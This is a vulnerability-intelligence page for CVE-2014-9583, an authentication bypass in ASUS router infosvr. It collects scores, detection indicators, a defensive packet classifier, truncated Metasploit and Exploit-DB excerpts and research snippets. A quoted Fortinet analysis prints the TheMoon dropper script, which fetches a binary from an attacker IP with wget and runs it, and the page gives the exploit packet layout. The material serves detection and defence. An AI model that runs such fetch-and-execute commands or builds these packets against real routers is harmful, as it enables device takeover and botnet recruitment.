CVE-2014-9583
Published 2015-01-08
Priority: P183 · critical · CVSS 2.0 score 10
CVSS vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 80.73% (99.6th percentile)
common.c in infosvr in ASUS WRT firmware 3.0.0.4.376_1071, 3.0.0.376.2524-g0013f52, and other versions, as used in RT-AC66U, RT-N66U, and other routers, does not properly check the MAC address for a request, which allows remote attackers to bypass authentication and execute arbitrary commands via a NET_CMD_ID_MANU_CMD packet to UDP port 9999. NOTE: this issue was incorrectly mapped to CVE-2014-10000, but that ID is invalid due to its use as an example of the 2014 CVE ID syntax change.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| asus | wrt_firmware | — | — |
| asus | wrt_firmware | — | — |
| t-mobile | tm-ac1900 | — | — |
Detection & IOCs (extracted from sources)
bytes: `0C 15 33 00 [4 random bytes] 00*38 <LE word: cmd_len> <cmd>`
sigma: 1130327 EXPLOIT ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution (CVE-2014-9583)
- Detect UDP packets to port 9999 with the NET_CMD_ID_MANU_CMD opcode. The exploit packet starts with bytes 0x0C 0x15 0x33 0x00 and is padded to 512 bytes total.
- The exploit response packet has PacketType byte == 0x16 (22 decimal) at offset 1 and a total length of 512 bytes; filter for UDP/9999 responses matching this signature.
- Monitor for the TheMoon bot dropping and executing a hidden file named '.nttpd' in /tmp on MIPS Linux devices; the file is fetched via wget from an attacker-controlled HTTP server.
- After compromise, the TheMoon bot installs iptables rules to block other attackers from re-exploiting CVE-2014-9583 (UDP/9999) and opens UDP/5143 for P2P C2 communication; anomalous iptables modifications on ASUS routers are a strong post-exploitation indicator.
- The Metasploit module for this CVE launches a BusyBox Telnet daemon on port 4444 (default TelnetPort option) after exploitation; detect unexpected telnet listeners on ASUS routers.
- The MAC address field in the infosvr packet is not properly validated (memcpy instead of memcmp); any crafted packet with a zeroed or arbitrary MAC field targeting UDP/9999 should be treated as an exploitation attempt.
- The TheMoon bot communicates with peers over TCP/4543 to download and execute additional payloads; monitor for outbound TCP/4543 connections from ASUS router IPs.
- Caveat: the exploit only works from the LAN side by default; the infosvr service listens on the LAN bridge interface, so external internet-facing detection may not be applicable unless the router is misconfigured.
- Caveat: the command payload is limited to 237 usable bytes; strings longer than 237 bytes cause a buffer overflow and may crash the infosvr service rather than executing the command.
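The request and response signatures listed above, turned into a small classifier for UDP datagrams. This is an added example, not code from any of the sources on this page; it assumes the "LE word" in the byte layout is a 2-byte little-endian length (so cmd_len sits at offset 46), and the sample datagrams are constructed here as zero-padded headers with no real command, purely to exercise the checks.

```python
import struct
from dataclasses import dataclass

INFOSVR_PORT = 9999
PACKET_LEN = 512
EXPLOIT_REQ_PREFIX = bytes.fromhex("0c153300")  # NET_CMD_ID_MANU_CMD request prefix
RESPONSE_TYPE_BYTE = 0x16                       # PacketType at offset 1 of a reply
MAX_SAFE_CMD_LEN = 237                          # longer commands overflow infosvr
CMD_LEN_OFFSET = 4 + 4 + 38                     # prefix + 4 random + 38 zero bytes (assumed 2-byte LE word)

@dataclass
class UdpDatagram:
    src_port: int
    dst_port: int
    payload: bytes

def classify(dgram):
    """Return a verdict for one datagram, or None if it does not match the signatures."""
    p = dgram.payload
    if dgram.dst_port == INFOSVR_PORT and len(p) == PACKET_LEN and p.startswith(EXPLOIT_REQ_PREFIX):
        cmd_len = struct.unpack_from("<H", p, CMD_LEN_OFFSET)[0]
        # Oversized length fields are more likely to crash infosvr than to run a command.
        return "exploit-request-oversized" if cmd_len > MAX_SAFE_CMD_LEN else "exploit-request"
    if dgram.src_port == INFOSVR_PORT and len(p) == PACKET_LEN and p[1] == RESPONSE_TYPE_BYTE:
        return "exploit-response"
    return None

def scan(datagrams):
    """Verdicts for every datagram that matched, in order; non-matching ones are dropped."""
    return [v for v in (classify(d) for d in datagrams) if v]

def _constructed_request(prefix, cmd_len):
    """Constructed sample body: header fields followed by zero padding to 512 bytes, no command."""
    body = prefix + b"\x00" * 4 + b"\x00" * 38 + struct.pack("<H", cmd_len)
    return body.ljust(PACKET_LEN, b"\x00")

# Constructed test traffic (not captured from a real device).
SAMPLE_PACKETS = [
    UdpDatagram(54321, INFOSVR_PORT, _constructed_request(EXPLOIT_REQ_PREFIX, 0)),
    UdpDatagram(54321, INFOSVR_PORT, _constructed_request(EXPLOIT_REQ_PREFIX, 300)),
    UdpDatagram(INFOSVR_PORT, 54321, bytes([0x0C, RESPONSE_TYPE_BYTE]).ljust(PACKET_LEN, b"\x00")),
    UdpDatagram(54321, INFOSVR_PORT, bytes([0x0C, 0x15, 0x01, 0x00]).ljust(PACKET_LEN, b"\x00")),  # other opcode
]

if __name__ == "__main__":
    for d in SAMPLE_PACKETS:
        print(f"{d.src_port} -> {d.dst_port}: {classify(d) or 'no match'}")
```

Because infosvr listens on the LAN bridge, this check belongs on an internal tap or on the router itself rather than at the WAN edge.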
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 10.0 | CRITICAL | — |
GHSA
GHSA-hv57-64g7-457f: common (ghsa_unreviewed · 2022-05-14 · severity HIGH)
Description identical to the CVE entry above.
VulnCheck
ASUS WRT firmware common.c in infosvr Remote Code Execution (vulncheck · 2014 · CVSS 10.0 · CRITICAL)
Description identical to the CVE entry above.
Affected: t-mobile tm-ac1900
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.trendmicro.com/en_us/res
No detection rules found.
Exploit-DB
ASUS infosvr - Authentication Bypass Command Execution (Metasploit) (exploitdb · 2018-04-24)

The Exploit-DB entry is a truncated copy of the Metasploit module; the class header between the class line and the 'Name' key was lost in extraction and is restored here only as far as standard Metasploit module boilerplate goes:

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ASUS infosvr Auth Bypass Command Execution',
      'Description' => %q{
        This module exploits an authentication bypass vulnerability in the
        infosvr service running on UDP port 9999 on various ASUS routers to
        execute arbitrary commands as root.

        This module launches the BusyBox Telnet daemon on the port specified
        in the TelnetPort option to gain an interactive remote shell.

        This module was tested successfully on an ASUS RT-N12E with firmware
        version 2.0.0.35.

        Numerous ASUS models are reportedly affected, but untested.
      },
      'Author'      =>
        [
          'Friedrich Postelstorfer', #
```
Exploit-DB
ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution (exploitdb · 2015-01-04)

The Exploit-DB entry is cut off after the header comment:

```python
#!/usr/bin/env python3
# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution
# Date: 2014-10-11
# Vendor Homepage: http://www.asus.com/
# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip
# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip
# Tested Version: 3.0.0.4.376_1071-g8696125
# Tested Device: RT-N66U
# Description:
# A service called "infosvr" listens on port 9999 on the LAN bridge.
# Normally this service is used for device discovery using the
# "ASUS Wireless Router Device Discovery Utility", but this service contains a
# feature that allows an unauthenticated user on the LAN to execute commands
# ', file=sys.
```
Metasploit
ASUS infosvr Auth Bypass Command Execution (metasploit)
This module exploits an authentication bypass vulnerability in the infosvr service running on UDP port 9999 on various ASUS routers to execute arbitrary commands as root. This module launches the BusyBox Telnet daemon on the port specified in the TelnetPort option to gain an interactive remote shell. This module was tested successfully on an ASUS RT-N12E with firmware version 2.0.0.35. Numerous ASUS models are reportedly affected, but untested.
Trendmicro
## VPNFilter-affected Devices Still Riddled with 19 Bugs
blogs_trendmicro · 2018-07-13 · IoT
By: Tony Yang, Peter Lee, Jul 13, 2018
This blog tackles the VPNFilter malware and if deployed devices are vulnerable to it. Based on our data, plenty of the devices are still using old firmware versions. In fact, 19 known vulnerabilities can still be detected in devices up to this day.
Our IoT scanning tool allows users to identify if connected devices (e.g. routers, network attached storage devices, IP cameras, and printers) in a given network are vulnerable to security risks and vulnerabilities, such as those related to Mirai, Reaper, and WannaCry.
We gather our data from the Trend Micro™ Home Network Security solution and HouseCall™ for Home Networks scanner. HouseCall for Home Networks
Trendmicro
## Identifying Top Vulnerabilities in Networks
blogs_trendmicro · 2018-05-29 · IoT
By: Tony Yang, Adam Huang, Louis Tsai, 2018/05/29
Our findings homed in on known vulnerabilities, IoT botnets with top vulnerability detections, and devices that are affected. Our scanning covered different OSs, including Linux, Mac, Windows, Android, iOS, and other SDK platforms.
We have noted time and again how compromising networks and connected devices is rooted in finding weak points in the system. Often, these are in the form of vulnerabilities. Worse, vulnerabilities that aren't even new. In the context of the internet of things (IoT) and noteworthy security incidents related to it, these vulnerabilities have afforded attackers means to use unsecure devices to facilitate malicious activities suc
Fortinet
## TheMoon - A P2P botnet targeting Home Routers
blogs_fortinet · 2016-10-20 · CVSS 10.0 · CRITICAL
FORTIGUARD LABS THREAT RESEARCH
By Bing Liu | October 20, 2016
In the post "Home Routers - New Favorite of Cybercriminals in 2016", we discussed the active detection of vulnerability CVE-2014-9583 in ASUS routers since June of this year. In this post we will dissect a bot installed on the affected ASUS routers.
The following figure shows attack traffic captured through Wireshark.
[Figure 1: Exploitation of CVE-2014-9583]
Below is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/.

```sh
#!/bin/sh
cd /tmp
rm -f .nttpd
wget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1
chmod +x .nttpd
./.nttpd
```

The vulnerable ASUS router will download and execute the binary file .nttpd from the attacker controlled website. The following
arXiv
## HADES-IoT: A Practical Host-Based Anomaly Detection System for IoT Devices (Extended Version)
arxiv_fulltext · 2019-05-03
Dominik Breitenbacher, Ivan Homoliak, Yan Lin Aung and Yuval Elovici (Singapore University of Technology and Design); Nils Ole Tippenhauer (CISPA Helmholtz Center for Information Security, ORCID 0000-0001-8424-2602)
## Abstract
Internet of Things (IoT) devices have become ubiquitous and are spread across many application domains including the industry, transportation
arXiv
## Technical Aspects of Cyber Kill Chain
arxiv_fulltext · 2016-06-10
Tarun Yadav and Rao Arvind Mallari, Scientists, Defence Research and Organisation, INDIA
## Abstract
Recent trends in targeted cyber-attacks have increased the interest of research in the field of cyber security. Such attacks have massive disruptive effects on organizations, enterprises and governments. The cyber kill chain is a model to describe cyber-attacks so as to develop incident response and analysis capabilities. The cyber kill chain, in simple terms, is an attack chain: the path that an intruder takes to penetrate information systems over time to execute an attack on the target. This paper broadly categorises the methodologies, techniques and tools involv
References
- http://packetstormsecurity.com/files/129815/ASUSWRT-3.0.0.4.376_1071-LAN-Backdoor-Command-Execution.html
- http://www.exploit-db.com/exploits/35688
- https://github.com/jduck/asus-cmd
- https://support.t-mobile.com/docs/DOC-21994
- https://www.exploit-db.com/exploits/44524/